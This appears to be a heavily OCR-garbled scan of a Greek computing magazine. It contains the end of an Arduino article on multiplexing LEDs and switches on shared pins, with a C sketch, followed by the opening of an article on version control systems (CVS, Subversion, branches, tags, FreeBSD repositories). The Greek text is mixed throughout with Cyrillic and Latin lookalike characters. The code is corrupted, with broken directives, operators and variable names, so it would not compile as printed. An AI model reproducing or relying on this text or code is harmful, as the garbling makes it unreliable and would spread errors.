νος κυλάει πιο арүй. Αυτὸς ο υπἐρ-ἠρωας ΠΡΟΛΑΒΑΙΝΕΙ va αντιληφθεὶ 
φαινόμενα που δεν συλλαμβάνουν οι δικές µας αισθήσεις και μπορεί να 
εκτελεἰ εργασἰες σε φαινομενικά μηδενικὀ χρόνο. Αυτὸς ο τρόπος σκέψης 
βοηθάει пара πολὺ ὁταν θέλουμε να βρούμε τη λύση σε ἑνα σύνθετο 
πρόβλημα ἡ órav апла θέλουμε va την υλοποιήσουμε κι έχουμε ζαλι- 
στεἰ... Oa σας το αποδείξουμε. 


Δύο σε ἑνα 


Σκεφτείτε τα τρία LED, τα οποία συναντήσαμε στα περισσότερα πειρά- 
ната µας μέχρι тора. Εάν ἐσβηναν yia ἑνα χιλιοστό του δευτερολέπτου 
και μετὰ επέστρεφαν στην προηγούµενη κατάσταση yia 1θχιλιοστὰ του 
δευτερολέπτου, τι θα βλέπαμε; Εξαρτάται, θα πουν οι υποψιασμένοι. Ένα 
ἄνθρωπος Ва ἐβλεπε τα LED μονίμως αναμμένα ἡ, τέλος πάντων, OTA- 
Өєра, στη “φυσιολογική” τους κατάσταση. О επεξεργαστἠς του Arduino 
όμως θα τα έβλεπε να σβήνουν yia ἑνα σημαντικὀ χρονικὀ διάστηµα ка! 
στη συνέχεια να επανέρχονται. Μάλιστα, с’ αυτὸ το Χρονικό διάστηµα о 
επεξεργαστἠς θα εἰχε την ευχέρεια να εκτελέσει διάφορες εργασίες. Па 
παράδειγµα, θα μπορούσε να αξιοποιήσει τους ακροδέκτες που συνδὲ- 
ονται στα LED για να διαβάσει μερικοὺς διακόπτες! Πλάκα δεν θα εἰχε; 


Φανταστείτε τρεις ακροδέκτες στους οποίους ἐχουμε συνδέσει τρία LED 
και τρεις διακόπτες (αν ὀχι επτά, µε τη βοήθεια διόδων). Σε va τέτοιο 
κύκλωμα οι διακόπτες δεν πρέπει να λειτουργούν συνεχώς. Αντίθετα, 
πρέπει να ενεργοποιούνται μόνον ὁταν το επιτρέπει το Arduino. Па αυτό 
το λόγο, οι διακόπτες δεν θα καταλήγουν στα Ον (GND), ὁπως συνήθως. 
Oa καταλήγουν σε ἑναν ἄλλον ακροδέκτη του Arduino, ο οποίος θα yi- 
νεται έξοδος και θα παΐρνει την τιµή low (OV) όταν πρέπει να ενεργο- 
ποιηθούν οι διακόπτες. Anó την ἄλλη, όταν οι διακόπτες πρέπει να ans- 
νεργοποιούνται θα μετατρέπεται σε εἰσοδο και µε την αντίσταση pull-up 
ενεργοποιημένη (5V). Όσο yia ra LED, θα πρέπει κι αυτά να συνδεθούν 
µε διαφορετικὀ τρόπο. Συγκεκριµένα, θα πρέπει να ἐχουν την κἀθοδό 
τους προς ro Arduino, ὥστε να ανάβουν όταν οι σχετικές ἐξοδοι του 
Arduino xouv τη λογικἠ тїнї O και να σβήνουν ὀταν ἐχουν τη λογική 
τιμὴ 1. Αυτό το θέλουμε διότι οι ἴδιοι ακροδέκτες που θα οδηγούν ra 
LED θα διαβάζουν και τους διακόπτες. Επομένως, οι ἴδιοι ακροδέκτες θα 
μετατρέπονται στιγμιαία σε εισόδους µε αντιστάσεις pull-up. Αν λοιπὀν 
συνδέαµετα LED µε ro συνηθισμένο τρόπο, ката τη διάρκεια ανάγνωσης 
των διακοπτώὠν τα LED θα ávafav avri να σβήνουν. Πολύ χειρότερα, то 
Arduino θα τα ἐβλεπε σαν πατηµένους διακόπτες! Ας περάσουμε ὁμως 
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στον κὠδικα. Κάπου εδώ, ὁσοι δεν xouv ευχέρεια µε ra ηλεκτρονικἀ 
μάλλον ανακουφίζονται... 


#аећпе btn port 7 // B00000111 
#аеһпе btn ddrd 128 // B10000000 
#аеһпе led port 128 // B10000000 
#define led аага 7 // B00000111 
byte led state; 
byte btn state; 
void setup() {} 
void loop() { 
{L -------- read buttons -------- 
DDRD = btn ddrd; // button-pins are inputs / button control- 
// pin is output 


PORTD = btn port; // pull-up resistor for button-pins / ground 
// button-control pin 


delay(1); btn state - PIND; 
btn state - btn state & btn port; 
/} -------- drive leds -------- 
DDRD = led аага; // led-pins are outputs / button control-pin 
// is input 
PORTD = led port | led state; // pull-up resistor for 
// button-control pin 
delay(16); 
if (btn state !- btn port) ( 
led state = led state ^ «οἴη state; 
PORTD = led port | led state; // update led-pins 
delay(128); 


} 
j 


Σε γενικὲς γραμμὲς o κὠδικας διαβάζει τους διακόπτες, οδηγεἰ τα LED, 
επεξεργάζεται τα τυχόν πατήματα των διακοπτὠν κι επαναλαμβάνει. Πιο 
συγκεκριµένα, ξεκινά μετατρέποντας τους ακροδέκτες µε τη διπλἠ λει- 
τουργία σε εισόδους. Ταυτόχρονα, τον ακροδέκτη στον οποίο καταλἠ- 
γουν oi δεύτερες єпафёс των διακοπτὠν τον μετατρέπει σε ἐξοδο - και 
µε τη λογική τιµή 0 (OV). Ακολούθως κάνει ἑνα икро διάλλειµα για 1ms. 
Αυτἠ η παύση εισάγεται για να προλάβουν oi ακροδέκτες του Arduino va 
κατασταλάξουν στη уға τους κατάσταση, WOTE το διάβασμα του PIND να 
ἐχει νόημα. Μια τέτοια καθυστέρηση ἐχει πάντοτε σημασία, отау алла- 
ζουμε ταχύτατα ro ρόλο των ακροδεκτὠν και θέλουμε στη συνέχεια va 
διαβάσουμε την κατἀστασὴ τους. Βέβαια o χρόνος που απαιτείται WOTE 
να ηρεµήσουν οι ακροδέκτες (settle, ὁπως λέει και το datasheet) ci- 
ναι της τάξης των μικροδευτερολέπτων. Εμεἰς καθυστερήσαμε για 1ms 
επειδἠ αυτός εἶναι ο ελάχιστος χρόνος καθυστέρησης που εισάγει η õi- 
αδικασἰα delay κι επειδἠ δεν θέλαμε να χρησιμοποιήσουμε πρὀσθετες 
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συναρτήσεις. Τέλος πάντων, µετά апо αυτή την καθυστέρηση ο κὠδικας 
διαβάζει την κατάσταση των διακοπτὠν και την αποθηκεύει στη µετα- 
βλητή btn state. Αμέσως μετά αντιστρέφει το ρόλο των ακροδεκτώὠν 
και οδηγεί ra LED, σύμφωνα µε την τιµή της μεταβλητής led. state. To 
πρόγραμμα μένει с’ αυτή την κατάσταση yia 16ms και προχωράει στην 
εξέταση της btn_state. Еау πατήθηκε κάποιο κουμπἰ, η led. state αλλάζει 
κατάλληλα ὡστε να αλλάξει αντίστοιχα και η κατάσταση ενὸς LED. Επι- 
πρὀσθετα, εφόσον εντοπίστηκε πάτημα διακόπτη εισάγεται uia πρὀσθετη 
καθυστέρηση, εν iðn de-bounce! Απλό δεν ἦταν; Κάθε φορά που πατάμε 
ἑναν διακόπτη ro LED που συνδέεται στον ἴδιο ακροδέκτη θα αλλάζει 
κατάσταση... 


Το κύκλωμα και ο κὠδικας που μόλις εξετάσαµε, αποτελούν µια εφαρµο- 
yr] της τεχνικἠς Time Division Multiplexing (TDM) ἡ απλά multiplexing. H 
εν λόγω τεχνική, μιλώντας αφηρημένα, προβλέπει την αξιοποίηση ενὀς 
καναλιού για τη μετάδοση πολλών και ετερόκλητων σημάτων, το καθένα 
апо τα οποία ἐχει πρόσβαση στο κανὰλι για ёха μικρὸ µερἰδιο χρόνου. Av 
αυτή η περιγραφἠ σας μπέρδεψε, µπορείτε va την ξεχάσετε! Στο μέλλον 
θα δούμε αρκετἐς εφαρμογὲς του multiplexing kai θα μπορέσετε va Ka- 
τανοήσετε την ουσία του στην πράξη. Πα την ора, σας προτείνουμε va 
φτιάξετε ἑνα κύκλωμα σαν αυτό nou εξετἀσαµε προηγουμένως, αλλά µε 
окто LED και окто διακόπτες που θα οδηγούνται апо ro PortD (Digital 
Pins 0-7). Σε auró το κύκλωμα η “δεύτερη” επαφἠ rov διακοπτὠν οφεἰ- 
λει να καταλήγει στο PBO (Digital Pin 8) και θα πρέπει va φορτώσετε 
TOV κὠδικα του sketch Code 00 10. Πρὀκειται για την παραλλαγή ενός 
πολύ παλιού παιχνιδιού, µε ro ὀνομα “Lights-Out”. Σκοπὸς σας εἶναι να 
σβήσετε ὁλα ra LED, πατώντας τους διακόπτες µε την κατάλληλη σει- 
ра. Βλέπετε, κάθε διακόπτης δεν αντιστρέφει την κατάσταση του ἆμεσα 
συνδεδεµένου LED αλλά και των γειτονικών! Па να ξεκινήσει το παιχνίδι 
πρέπει να πατήσετε ἑνα κουμπΙ... 


Καλή διασκέδαση! 
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Δύο ro πρωΐ. Εἰστε στο κρεβάτι σας, алла o ύπνος εἶναι ανήσυχος. To £K- 
πληκτικὀ σας software project δεν αποδἰδει кала. О κὠδικας (χειρὀτερος 
апо το σπαγγέἑτι που φάγατε ro μεσημὲρι) δεν εἶναι ὀ,τι θα χαρακτηρἰζαμε 
ως, χμ, βέλτιστο. О ιδέες ἐχουν μάλλον στερέψει! О εγκἐφαλὸς σας, σε 
µια ύστατη προσπάθεια, γράφει κὠδικα για σας ενώ λαγοκοιµάστε... 


Ξαφνικά πετάγεστε апо το κρεβάτι κι ως ἄλλος Αρχιμήδης φωνάζετε ¿va 
βροντερὀ «εὐρηκα!» (Σ.τ.Ε. Eyo πάντως θα δυσκολευόμουν να φωνάξω 
“εὐρηκα” - ἡ τουλάχιστον ἐτσι νομίζω.) Έχετε βρει επιτέλους την εκπλη- 
KTIK ιδέα που θα κάνει το πρὀγραμμά σας να εκτελείται τουλάχιστον 
100% πιο γρήγορα -- κι auró θα του επιτρέψει να τρέξει σε λιγότερους 
απὀ 256 πυρήνες nou το τρέχετε тора ;) Χωρίς va λογαριάζετε τίποτα, 
κάθεστε στην προγραμματιστικἠ σας καρέκλα κι αρχἰζετε να γράφετε KW- 
δικα. Μέχρι το πρωΐ θα ἐχετε τελειώσει, σκέφτεστε, και φαντασιώνεστε 
τη στιγμὴ της δικαἰωσης! Εννοείται ὁμως бт! μέσα στην ἑξαψή σας δεν 
κρατήσατε οὐτε καν £va αντίγραφο του παλιού σας κὠδικα. Ma τι να TO 
κάνετε, ἀλλωστε; Οι αλλαγὲς εἶναι τόσο μαζικές, οι βελτιώσεις нє TIG KAI- 
νούριες σας ιδέες τόσο μεγάλες... Κι επιτέλους, μετὰ апо αρκετὲς opea 
φτάνει η opa της δοκιμής: Ρουφἀτε την τελευταία γουλιά του ν-οστού 
σας καφὲ και μόλις τελειώνει η μεταγλώττιση, το ξεκινάτε... En! Τι έγινε 
βρε παιδιά; Το πρόγραµµα δεν τρέχει! Δηλαδή τρέχει, алла σέρνεται ne- 
ρισσότερο апо κάθε ἄλλη φορά :S Κοιτάζετε την οθόνη ξανά και ξανά, 
καθώς η καφεῖνη στο aipa σας αρχίζει επιτέλους να επιδρἀ. Τα νεύρα σας 
φουντώνουν... E, vai λοιπὸν, η λύση nou εἰχατε σκεφτεί μοιάζει να έχει 
μερικὰ προβλήματα. Δεν δουλεύει όπως ακριβώς περιμένατε και, ката 
πὼς φαίνεται, οὐτε και πρὀκειται. Τα νεύρα σας συνεχίζουν να φουντώ- 
νουν. Αυτὸ που θα σας ἐσωζε тора εἶναι ο палос κὠδικας... 


Εἰμαστε σίγουροι бт! η µικρή µας διήγηση, µε μικρές ἡ oro μεγάλες 
διαφοροποιήσεις, εἶναι γνώριμη σε пара πολλούς. Ελπίζουμε επἰσης va 
καταλήξατε κι εσεἰς στα ακόλουθα ηθικἁ διδάγματα: 


ο Της νύχτας τα καμώματα τα βλέπει η μέρα και γελά (σας ro ἐλεγε η 
μαμά σας, αλλὰ εσεἰς τίποτα). 


ο Δεν εἶναι σκὀπιµο va κυκλοφορεἰτε στο σπἰτι πριν ανάψετε το φως, 
ειδικἁ όταν δεν θυμόσαστε που παρατήσατε εχθὲς то skateboard. 


ο Χρειάζεστε ἑνα σύστημα nou θα σας προφυλάσσει апо το ηθικὀ 
δίδαγμα 1. 


Καλώς ἠλθατε στα συστήματα ελέγχου εκδόσεων, Version Control 
Systems ἡ VCSes! Μπορεί va τα συναντήσετε και σαν repositories (ναι, 
συγγενεύουν µε та αποθετἠρια των бтауороу αλλά µην ra μπερδεύετε) 
ἡ να ακούσετε να τα χαρακτηρἰζουν ως uia λύση για то λεγόμενο Source 
Configuration Management. 


Τι κάνει ἑνα VCS; 


Ένα прбүранна ελέγχου εκδόσεων καλύπτει δύο βασικὲς ανάγκες: 


ο Την εὐκολη τήρηση πολλαπλών εκδόσεων των αρχείων πηγαίου 
κώδικα ενὸς project. 


ο Τη δυνατότητα συνεργασίας πολλών ατόμων σε va project, µε 
ταυτόχρονη διασφάλιση του κὠδικα και του ιστορικού των EKÓÓ- 
σεων. 


Αναφερὀµαστε ὀλη αυτή την opa σε nnyaio κὠδικα, αλλά σκεφτείτε От! 
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Γιώργος Γιάννης Ούρσουλα 


στη θέση του κὠδικα θα μπορούσατε να έχετε οποιαδήποτε άλλα αρχεία 
plain text. Па παράδειγµα, θα μπορούσατε va εργάζεστε στον κὠδικα 
HTML µιας ιστοσελἰδας, σε ёха μεγἁλο κείμενο που το γράφετε σε LaTeX 
ἡ σε ἑνα καλλιτεχνικὀ έργο ASCII art. Στα περισσότερα VCS μπορούμε 
(συνήθως εὐκολα) να προσθέσουμε και αρχεία δυαδικἠς μορφἠς (φωτο- 
γραφίες, σχεδιαγράμματα, αρχεία του OpenOffice (unppp...) k.à.). BÈ- 
Вата, σε αρχεία non-plain text χάνουμε μία καταπληκτική δυνατότητα 
που µας προσφέρουν ra VCS: Να βλέπουμε τις διαφορὲς μεταξύ δύο 
οποιωνδήποτε εκδόσεων ενὸς αρχείου και να δημιουργούμε αρχεία µε 
αυτὲς (τα λεγόμενα diffs). Еду δεν το αντιληφθήκατε, µε αυτά τα αρχεἰα 
μπορούμε να δημιουργούμε patches yia τα project στα οποία συμμετὲ- 
χουμε. Όλα αυτά βέβαια μέχρι να βαρεθούν και να µας δώσουν απευθεἰας 
πρὀσβαση στο VCS rou project. Διότι, µπορεί να το παραλεἰψαµε, αλλά 
τα VCS λειτουργούν και µέσω δικτύου (τοπικού, Internet, ταχυδρομικών 
περιστεριών -- you get the idea!) 


Xpnoiponoizi κανεῖς VCS; 


Αν δεν то καταλάβατε ἠδη, όλοι εκτὸς апо εσάς. Όλα ra γνωστὰ software 
project yia την ανἀπτυξή τους στηρἰζονται σε κάποιο version control 
system. Διαφορετικά η ανάπτυξη θα ἠταν απλώς αδύνατη. Φανταστείτε 
µόνο πόσος κόσμος ασχολείται σήμερα µε rov κὠδικα του GNU/Linux ἡ 
TOU FreeBSD. Πώς θα ἦταν δυνατὸν να συντονιστούν τόσα ἄτομα μεταξὺ 
τους, αν δεν μπορούσε ο καθένας -ανά пайса oriyur|- va ἐχει την τελευ- 
Taia ἐκδοση rou κὠδικα; Τι θα γινόταν αν δύο άτομα ἑκαναν ταυτόχρονα 
aAAayr| στο ἴδιο αρχείο; Όλα αυτά τα προβλήµατα λύνονται αυτόματα апо 
το VCS. Όπως υποψιάζεστε, στα VCS, ὀπως εξάλλου και σε πολλά алла 
εργαλεία ανοικτού/ελεύθερου λογισμικού, ισχύει το εξἠς ρητὀ: Αν κάτι 
αξίζει να το κάνεις, αξίζει και va το παρακάνεις! Ως εκ τούτου, υπάρχουν 
παραπάνω апо 20 διαφορετικἁ VCS ελεύθερου λογισμικού, ὁπως και pE- 
ріка κλειστά (n.x., το Microsoft Visual Source Safe). Ένα калофтіаүрёуо 
VCS κάνει τη ζωή του χρήστη nio εὐκολη: Εἶναι anAó στη χρήση και µας 
επιτρέπει να επικεντρὠνουµε στον κὠδικα. Αυτό εἶναι και το ζητούμενο 
ἄλλωστε, ἐτσι δεν εἶναι; 


Μια εικόνα εἰναι 
1024 λέξεις ;) Ο 
τρόπος λειτουργίας 
ενός centralized 
VCS εἶναι φανερός. 
О Πώργος, o Πάν- 
νης και η Οὐρσου- 
λα (1) £xouv µια 
περιοχή εργασίας 
στο δίσκο τους, 

µε τα αρχεία που 
επεξεργάζονται. Πα 
να κάνουν όμως 
commit rj update 
(για va καταχωρή- 
σουν τις αλλαγές 
τους) πρέπει va 
είναι συνδεδε- 
μένοι στο δίκτυο 
και στο KEVTDIKÓ 
repository. 
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Πρὀσθετες παροχὲς 


Σε γενικὲς γραμμές, κάθε VCS αποθηκεύει τα αρχεία nou Вріско- 
ута! υπὸ τον ἐλεγχο TOU ως µια σειρὰ апо αρχεία διαφορών (diff 
files). Αργότερα, µε τη βοήθεια aurov των αρχείων µπορεί va 
συναρµολογήσει οποιαδήποτε παλιὰ ἐκδοση του ζητήσουμε: Апо την 
πρώτη nou γράψαμε πριν μερικὰ χρόνια, μέχρι αυτἠ nou πειράζαμε χθες 
βράδυ. Όμως εκτὸς апо τις υπηρεσίες φύλαξης nou λἰγο-πολὺ αναφἑρα- 
µε μέχρι тора, ra VCS προσφέρουν πολλὲς ακόμα. Πρόκειται για υπηρε- 
oiec -θα μπορούσατε να τις πείτε κι ευκολίες- που βρίσκουν εφαρµογή σε 
μεγάλα project. Ας ρίξουμε µια ματιά, va γλυκαθούμε. 


9 Δημιουργία branches. Πρόκειται για τις λεγόμενες "γραμμές ανά- 
πτυξης”. Εἶναι πιθανὸν για va project σε κάποια φάση να ακολου- 
θήσει δύο ἡ περισσότερους διαφορετικοὺς δρόμους ανάπτυξης. О 
κώδικας τότε εξελίσσεται διαφορετικά σε κάθε παρακλὰδι. 


Παράδειγμα: Στο FreeBSD Project ἐχουμε το λεγόμενο "STABLE 
branch" nou αποτελεἰ rov κὠδικα των σταθερών γενικἀ εκδόσεων 
(µε oxerikà μικρὲς βελτιώσεις στον κὠδικα σε κάθε RELEASE), καθώς 
και το λεγόμενο "CURRENT branch" που αποτελεἰ τη ταχεία γραμμή 
ανάπτυξης και οδηγεἰ στην επόμενη, μεγάλη ἐκδοση. Κάποια απὀ τα 
αρχεία του STABLE και Tou CURRENT εἰναι ἴδια, αλλά av κάποιο ap- 
x£io ἐχει μεγάλες πειραματικὲς αλλαγές εἶναι βέβαιο бт! Ва το βρείτε 
στο СОВВЕМТ. 


e Δημιουργία tags ἡ ετικετών. Ta branches μὰς επιτρέπουν να ði- 
arnpoüUpe διαφορετικὲς γραμμὲς ανάπτυξης, evo τα tags -πολύ πιο 
απλά-- μάς επιτρέπουν να μαρκάρουμετην κατάσταση του repository, 
ὧστε να μπορούμε αργότερα να ανατρέξουµε γρήγορα σε αυτή. Πριν 
βγάλουμε λοιπὸν την επίσημη ἐκδοση rou SuperDuper 1.0 puno- 
роон va µαρκάρουμε την τρέχουσα κατάσταση rou repository ως 
"superduper-1.0". Με αυτόν τον τρὀπο αργότερα θα μπορούμε -pE 
µια κἰνηση- να πάρουμε ξανά τα αρχεία αυτής της συγκεκριμένης 
ἐκδοσης. Εναλλακτικά, θα μπορούσαμε να χρησιμοποιήσουμε το tag 
για να δημιουργήσουμε αρχεία διαφορών, μεταξύ εκεἰνης της ἐκδο- 
σης του κὠδικα και της τρἐχουσας. 


Παράδειγμα: Το FreeBSD Project χρησιμοποιεὶ συχνὰ ετικέτες (й 
ετικἐτες εκδόσεων, release tags) για va μαρκάρει τον πηγαίο κὠδι- 
ка των επἰσημων εκδόσεων. Πα παράδειγµα, το release tag για την 
ἐκδοση FreeBSD 7.4-RELEASE εἶναι το "RELENG 7 4 0 RELEASE". 
Εμείς Aoinóv μπορούμε αρκετά апла να ζητήσουμε ra αρχεἰα nou xa- 
ρακτηρίζονται µε αυτό ro tag και να “χτίσουμε” μόνοι µας ολόκληρη 
την ἐκδοση 7.4 του FreeBSD! Μάλιστα για κἀποιο περἱεργο λὀγο αυτὀ 
το αποφασίζουμε σχεδὸν πάντα στις 11 το βράδυ ;) Апо εκεἰ μάλλον 
βγαίνει και η γνωστὴ ἐκφραση "καλές τρεις” (το npoi). 


e Καθώς καταχωρούμµε αλλαγές στο VCS, εκτὸς απὀ та ἴδια τα αρχεία 
το σύστημα καταγράφει κι ἄλλα στοιχεία: Το χρήστη που ¿kave την 
αλλαγή, ἑνα σύντομο μήνυμα που θἑλουµε va συνοδεύει τις αλλαγές 
μας, την ημερομηνἱα και την ώρα των αλλαγών, καθώς κι ἐναν αριθ- 
ро που δείχνει συνήθως πόσες φορὲς ἐχει τροποποιηθεί το εκάστοτε 
αρχείο. Με αυτά τα στοιχεία (log) μπορούμε αργότερα να βρούμε 
ποιος φταίει που δεν τρέχει ο κὠδικας (ποιος ¿Kave την καταραμένη 
αλλαγἠ) ἡ va επιβραβεύσουμε αυτόν που то ἐφτιαξε! 


e Τέλος, δεν εἶναι απίθανο για δύο developer να δουλεύουν ταυτὀ- 
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xpova στο ἰδιο αρχείο και -av εἷμαστε αρκετἁ ἁτυχοι- ото ἰδιο ἡ 
σε kovrivà σημεία! Σε αυτή την περίπτωση, то VCS θα βοηθήσει va 
αναμειχθούν οι αλλαγές των δύο προγραμματιστών χωρίς va χαθεὶ 
τίποτα. Εμείς, προφανώς, µένουµε µε την ελπίδα бт! το αποτέλεσµα 
θα συνεχίσει να δουλεύει. H ελπἰδα ἄλλωστε πεθαίνει τελευταἱα. 


Checkout 
Update 


Checkout 
Update 


Commit 


Checkout 
Update 


Βασικὲς λειτουργίες κι εντολές 


Ας δούμε λίγο την ορολογἱα που χρησιμοποιεὶ ἑνα VCS. Οι περισσότερες 
απὀ τις παρακάτω λέξεις χρησιμοποιούνται αυτούσιες και ως εντολές, 
στα περισσότερα τουλάχιστον VCS. 


Checkout. Н λειτουργία aurr| µας επιτρέπει να πάρουμε ¿va αντίγραφο 
(working сору) των αρχείων yia να αρχίσουμε να δουλεύουμε. Τυπικά, 
θα θέλουμε να πάρουμε την τελευταἰα ἐκδοση. Ωστόσο μπορούμε να ζη- 
τήσουµε οποιαδήποτε παλιότερη θέλουμε, χρησιμοποιώντας eire κάποιο 
tag, εἶτε kànoio ҳарактпрістіко αριθμὀ ἑκδοσης που δίνει το VCS (οι 
λεπτομέρειες γι’ αυτόν τον αριθμὀ και το пос μεταβάλλεται εξαρτώνται 
anó την υλοποίηση του VCS που χρησιμοποιούμε). 


Checkin rj Commit. Εἶναι η διαδικασία µε την onoia καταχωρούμµε τις 
αλλαγές που έχουμε κάνει, ὡς µια νέα ἐκδοση. Av το repository δεν εἶναι 
OIKÓ µας, θα πρέπει προφανώς να µας ¿xouv δώσει το αντίστοιχο δικαϊω- 
μα. Όσοι ¿xouv αυτό το δικαίωµα ονομάζονται committers. 


Add και Remove: Διαδικασίες pE TIG οποίες μπορούμε va προσθέσουµε ἡ 
να αφαιρέσουμε κἄποιο αρχεἰο апо τον έλεγχο του VCS. Όταν δηµιουρ- 
γούμε ἑνα αρχείο στον ἴδιο κατάλογο µε ra υπόλοιπα αρχεἰα ενὸς project, 
το VCS δεν αρχίζει αυτόματα va το παρακολουθεί. Κάτι τέτοιο θα εἶχε 
ανεπιθύμητα αποτελέσµατα! Па παράδειγµα, το VCS θα ἀρχιζε va napa- 
κολουθεἰ τα προσωρινά αρχεία που προκύπτουν апо τη μεταγλώττιση. 


Diff: Μας επιτρέπει να δούμε τις διαφορές μεταξύ δύο εκδόσεων ενὸς 
αρχείου. Πα παράδειγµα, της τρέχουσας ἐκδοσης και εκείνης nou εἰχαμε 
γράψει πριν апо δύο μέρες, µε το τάδε tag ἡ rov τάδε αριθμό ἐκδοσης. 


Log: Μπορούμε να δούμε το ιστορικό των καταχωρήσεων (commits) Ka- 
8606 και λεπτομέρειες για το πότε και απὀ ποιον ёүм η καθεμία. 


Φαίνεται πιο πολύ- 
πλοκο - και εἰναι! 
Εἶναι όμως και πολύ 
πιο αποτελεσματικό. 
О Πώργος, o Πάννης 
και η Οὕρσουλα 
έχουν ὁλοι τους 

апд ἑνα πλήρες 
τοπικὀ αντίγραφο 
TOU repository κι 
εργάζονται σε αυτό. 
Επίσης, o καθένας 
έχει τη δική TOU 
περιοχή εργασίας. Н 
σύνδεση στο δίκτυο 
απαιτείται μόνο ὁταν 
κάποιος πρέπει να 
στείλει ἡ να πάρει τις 
αλλαγές απὀ κάποιον 
ἄλλον. Αυτό γίνεται 
µε τη βοήθεια των 
διαδικασιών push καὶ 
pull. 
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Ένα δημόσια δια- 
Ooo repository 
µπορεί να ἐχει και 
web interface! Στην 
εικόνα φαίνεται η 
κατάσταση ενός 
αρχείου του Ελ- 
AnvikoU FreeBSD 
Handbook (http:// 
cvsweb.freebsd. 
org). Όπως φαντά- 
ζεστε, πρὀκειται 
για το επίσημο 
repository µε TO 
documentation 
rou FreeBSD. Πίσω 
απὀ το γραφικὀ 
περιβόλλον βρί- 
OKETGI το σύστημα 
CVS (Concurrent 
Versions System). 


Ө © © / даосы салзоввзэ-?/Ьоо& х 2) ! E 
€ 3 С fi | © www.freebsd.org/cgi/cvsweb.cgi/doc/el_GR.IS08859-7 /books/handbook/desktop/ 
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Status: Μπορούμε va δούμε την τρέχουσα κατάσταση rou repository, 
ποια αρχεία ¿xouv αλλάξει ἡ προστεθεἰ апо την τελευταία καταχώρηση 
(commit) k.An. 


Merge: Μπορούμε va αναμείξουµε αλλαγὲς nou ἐχουν γίνει στο ἰδιο ap- 
χεἰο апо διαφορετικἁ ἄτομα (ouch!) 


Κεντρικά και Κατανεμημένα repositories 


Ta repositories μπορούν να λειτουργήσουν κεντρικἁ ἡ κατανεμημένα. 
Ευτυχώς υπάρχουν αρκετὲς υλοποιήσεις και апо τα δύο εἰδη yia να δια- 
λἐξετε! Τα περισσότερα σύγχρονα repositories σχεδιάζονται για va λει- 
τουργούν ως κατανεμημένα, ενώ οι παλιότερες υλοποιήσεις ἦταν κυρίως 
κεντρικές. 


Σε ἑνα κεντρικὀ VCS (ἡ Centralized VCS) υπάρχει όπως каталаВаі- 
VETE ἑνα κεντρικὀ σημείο (Φανταστείτε το ως ¿va μηχάνημα) στο onoio 
αποθηκεύεται το repository. Н τυπική рой εργασίας ενός χρήστη ἐχει ως 
εξής: 

ο Συνδέεται στο VCS και κάνει checkout για να πάρει ἑνα working 
copy των αρχείων. Τυπικά, λαμβάνει τις τελευταίες εκδὀσεις των 
αρχείων (στην ορολογία του VCS αυτό ονομάζεται head). Αν όμως 
δουλεύει σε κἀποιο branch, µπορεί να πάρει τα αρχεία του συγκε- 
κριµένου branch και μόνο. 


ο Τα αρχεία nou πἠρε βρίσκονται πλέον στον δικὀ του υπολογιστή, σε 
ἑναν κατάλογο που ονομάζεται περιοχἠ εργασίας, σύμφωνα µε την 
ορολογἱα των VCS. Μπορεἰ λοιπὸν να ξεκινήσει την εργασία του. 


СЗ apple Ө! Yahoo! 


v Free BSD, The Power To Serve 


Home | About | GetFreeBSD | Documentation 


Google Maps Ñ$ YouTube W Wikipedia { 


ews C Popular (7 UNIX / Linux Tutor! ἴθ FreeBSD Handbook (f Εγχειρίδιο rov Fres P 


Text Size: / 


Community | Developers | Support | Foundation 


doc/el. GR.ISO8859-7/books/handbook/desktop/ 


Click on a directory to enter that directory. Click on a file to display its revision history and to get a chance to display diffs between 


revisions. 


Current directory: [FreeBSD] / doc / el GR.ISO8859-7 / books / handbook / desktop 


File — Rev 


Age Author | Last log entry 


«9 parent Directory 


(Е) chapter.sgml 


;4. Update the Greek Handbook to the latest changes MFen: 
1.20 2 days manolis 1.115 -> 1 116 desktop ... 


Show only files with tag: ( All tags / default branch $) Module path or alias: |doc/el GR.ISO88 | Со | 


m General options 


Sort files by:(rie +), case-insensitive: |. 
Sort log by: 
Diff format: 


Hide files in Attic: М 
Show line numbers: _ 


Change Options 


Legal Notices | © 1995-2011 The FreeBSD Project. All rights reserved. 


wQ FreeBSD.o! 
2010/11/13 16:37:18 
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VCS και καιµηθείτε ήσυχαι! (part 1 of 


Pa 


ο Όταν τελειώσει συνδέεται ξανά στο repository και κάνει commit (ἡ 
checkin) τα αρχεία µε τις αλλαγές του. 


Επομένως, βλέπουμε ὁτι η σύνδεση απαιτείται μόνο για τις διαδικασίες 
checkout και checkin. Την opa nou επεξεργαζόµαστε та αρχεία μπορούμε 
να εἶμαστε offline. Βέβαια, αν ro repository βρίσκεται στο δικὀ µας μηχά- 
упра έχουμε πάντα πρόσβαση! Προσέξτε ὁτι το κεντρικὀ repository ἐχει 
δύο ...kevTpikà προβλήματα: 


1. Χρειαζόμαστε σύνδεση στο Oikruo/Internet yia να κάνουμε 
commit, órav ro repository δεν βρίσκεται στον τοπικὀ µας õi- 
око. Φυσικἁ, όταν πρὀκειται για κἄποιο μεγάλο (ἡ και διεθνές) 
project, ro repository αποκλεἰεται να βρίσκεται στο δίσκο µας. 


2. Av τελικἁ το VCS βρίσκεται στο δίσκο µας, ουσιαστικά δεν 
έχουμε backup! 


Μερικά γνωστά centralized VCSes εἶναι το CVS και το Subversion. To 
CVS ἦταν anó ra прота και τα χρόνια του, χμ, φαίνονται! Χρησιμοποι- 
εἶται πάντως ακόµα (n.x., To FreeBSD ro χρησιμοποιεί yia τα doc, www, 
port trees). Λόγω των αδυναμιὼν nou χαρακτηρἱζουν ra centralized 
repositories арк=тоі developer χρησιμοποιούν και κάποιο distributed 
repository, μεταφέροντας patches апо το ¿va στο алло! 


eoe / “5 mercurial/freebsd-doc-el: c x ον 


< ο ff ©) mercurial.freebsdgr.org/mercurial/freebsd-doc-el/rev/6be70913de04 


You 


D7 Apple ©! Yahoo! 4 Google Maps (YouTube W Wikipedia News (С Popular (.) UNIX / Linux Tutor- M 


mercurial/freebsd-doc-el / changeset 


summary І shortlog I changelog | graph | tags | bookmarks | branches | files | changeset гам | gz 1 help 


PR: docs/162597: Clear up the example on adding swap space 


author Manolis Kiagias <sonicy@otenet.gr> 
Wed Nov 16 08:46:03 2011 +0200 (2 days ago) 
changeset 2501 6be70913de04 
parent 2500 783751724ffd 
child 2502 450£5b302747 


PR: docs/162597: Clear up the example on adding swap space 


en. US.ISOBB59-1/books/handbook/config/chapter.sgml її | annotate ! diff 1 revisions 


